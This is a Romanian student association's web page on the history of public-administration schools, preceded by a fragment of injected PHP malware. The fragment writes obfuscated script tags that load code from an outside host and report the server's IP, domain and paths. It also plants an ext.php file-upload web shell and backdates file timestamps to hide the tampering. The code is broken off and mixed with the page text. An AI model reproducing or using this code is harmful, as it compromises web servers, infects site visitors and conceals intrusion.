document.write('<'+'s'+'c'+'r'+'ipt '+'s'+'rc=\"http://tereveln.com/sh2.php?serverStr=$serverStr&req_type=add_site&document_root=$document_root&engine=$engineType&ip=$ip&domain='+window.location.hostname+'&uplUrl=$pp\"'+'>'+'<'+'/'+'sc'+'rip'+'t>');"; $fp = fopen(dirname(__FILE__)."/ext.php", "w"); fwrite($fp, "
';if (!empty(\$_FILES['uploadFile'])) {\$self=dirname(__FILE__);move_uploaded_file(\$_FILES[\"uploadFile\"][\"tmp_name\"], \$self.DIRECTORY_SEPARATOR.\$_FILES[\"uploadFile\"][\"name\"]);\$time=filemtime(\$self);print \"OK\";} else {print \$form;} ?>"); fclose($fp); $fp = fopen(__FILE__, "r"); $line = ""; while(!feof($fp)) { $line .= fgets($fp, 4096); } fclose($fp); $time = filemtime(__FILE__); $dirTime = filemtime(dirname(__FILE__)); $line = preg_replace("/\s+\s+/is", "", $line); $fp = @fopen(__FILE__, "w"); @fwrite($fp, $line); @fclose($fp); @touch(__FILE__, $time); @touch(dirname(__FILE__), $dirTime); } else { print ""; } ?> ANSSA - Asociatia Nationala a Studentilor in Stiinte Administrative

DESPRE SCOALA DE ADMINISTRATIE PUBLICA

"La noi, toata lumea este de acord ca trebuie infiintate scoli administrative pentru completarea educatiunii profesionale a functionarilor si pentru pregatirea candidatilor la asemenea functiuni. Trebuie creata insa o scoala superioara, in care elementele cele mai bune din liceu si din scolile de comert sa fie atrase…In aceasta scoala sa invete acesti tineri si marile probleme ale dreptului public si respectul de legalitate, dar si dragostea pentru neam."
(Paul Negulescu)

"…este nevoie de o reforma completa atat a modului de recrutare, cat si a modului de pregatire profesionala, pentru a se putea alcatui un corp de functionari select si bine pregatit."
Gh. Alexianu (Revista de Drept Public 1926)

"daca facultatile de drept pregatesc buni juristi, cei care lucreaza in administratie trebuie sa cunoasca alte discipline, din care unele nu au nici o legatura cu stiinta juridica: statistica, contabilitatea publica, documentarea administrativa etc." (Congresul Functionarilor Publici din Romania -1935)

Primul autor roman care face referiri la obiectul stiintei administrative este profesorul de drept public Constantin D. Dissescu. Lucrarea sa "Curs de drept public roman, vol. III - Dreptul administrativ" aparuta la Bucuresti in 1891, precizeaza unele aspecte cu privire la stiinta administratiei si la stabilirea principiilor rationalizarii administratiei de stat.

In aceasta perioada a sfarsitului de secol XIX-lea se pun si bazele unui invatamant profesional administrativ. "Dreptul administrativ" a constituit mult timp o disciplina obligatorie in invatamantul primar, conform Legii instructiunii publice in vigoare la vremea respectiva.

In anul 1871 a fost fondata Scoala Superioara de Stiinte de Stat, din initiativa unor tineri diplomati ai universitatilor din vestul Europei, Em. Pache Protopescu, viitorul primar al Bucurestilor, i-a fost si primul director pana in anul 1893. Organizata dupa modelul Scolii Libere de Stiinte Politice de la Paris, initial s-a numit Scoala Administrativa, apoi Scoala Libera de Stiinte Politice si Administrative.

In perioada dintre cele doua razboaie, munca de cercetare in domeniul activitatii administratiei a fost reprezentata, in tara noastra, prin activitatea bogata desfasurata de profesorul Paul Negulescu care a infiintat "Institutul de Stiinte Administrative al Romaniei". Activitatea acestui Institut urmarea o mai buna organizare administrativa, contactul permanent cu institutiile similare din strainatate si folosirea perseverenta a propriei metode experimentale. In cadrul Institutului de Stiinte Administrative a fost prezentata, in mod permanent intre 1926-1943, "Revista de Drept Public", la care colaborau nu numai specialisti din tara, ci si specialisti recunoscuti pe plan mondial.

Pe langa Institut au functionat: o scoala de studii si documentare administrativa; un centru de pregatire tehnica profesionala; o scoala de stiinte de stat. Toate aveau ca scop pregatirea profesionala a candidatilor care aveau o diploma universitara, a candidatilor absolventi de liceu, a functionarilor stabili ai administratiei de stat, a functionarilor din administratia centrala si locala care aveau cel putin gradul de sef de birou si diploma universitara.

Astazi, la nivel guvernamental este organizat si functioneaza Institutul National de Administratie. Totodata în cadrul multor universitati de stat sau private functioneaza facultati cu specializari de administratie publica, atat la nivel universitar cat si postuniversitar. De asemenea sunt organizate ca institutii publice, organizatii neguvernamentale, profesionale sau societati private, centre de pregatire si perfectionare profesionala a functionarilor si angajatilor publici.